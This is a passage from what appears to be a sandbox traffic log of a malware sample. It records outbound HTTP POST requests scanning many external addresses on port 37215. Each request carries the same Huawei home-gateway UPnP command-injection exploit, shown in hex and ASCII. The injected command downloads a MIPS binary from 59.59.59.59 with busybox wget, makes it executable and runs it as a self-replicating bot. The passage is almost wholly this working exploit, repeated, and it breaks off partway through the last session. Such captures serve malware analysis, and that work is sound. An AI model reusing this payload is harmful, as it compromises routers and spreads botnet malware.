                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2383192.168.2.1541366197.172.83.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392452955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2384192.168.2.1558138197.27.188.24237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392473936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2385192.168.2.1554400197.235.28.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392533064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2386192.168.2.1537244197.7.77.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392554045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2387192.168.2.155654041.54.240.6537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392731905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2388192.168.2.155643241.160.235.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392760992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2389192.168.2.154843241.189.151.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392781019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2390192.168.2.1558832149.249.83.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392839909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2391192.168.2.156053241.64.176.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.397403002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2392192.168.2.155677439.182.39.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.397423983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 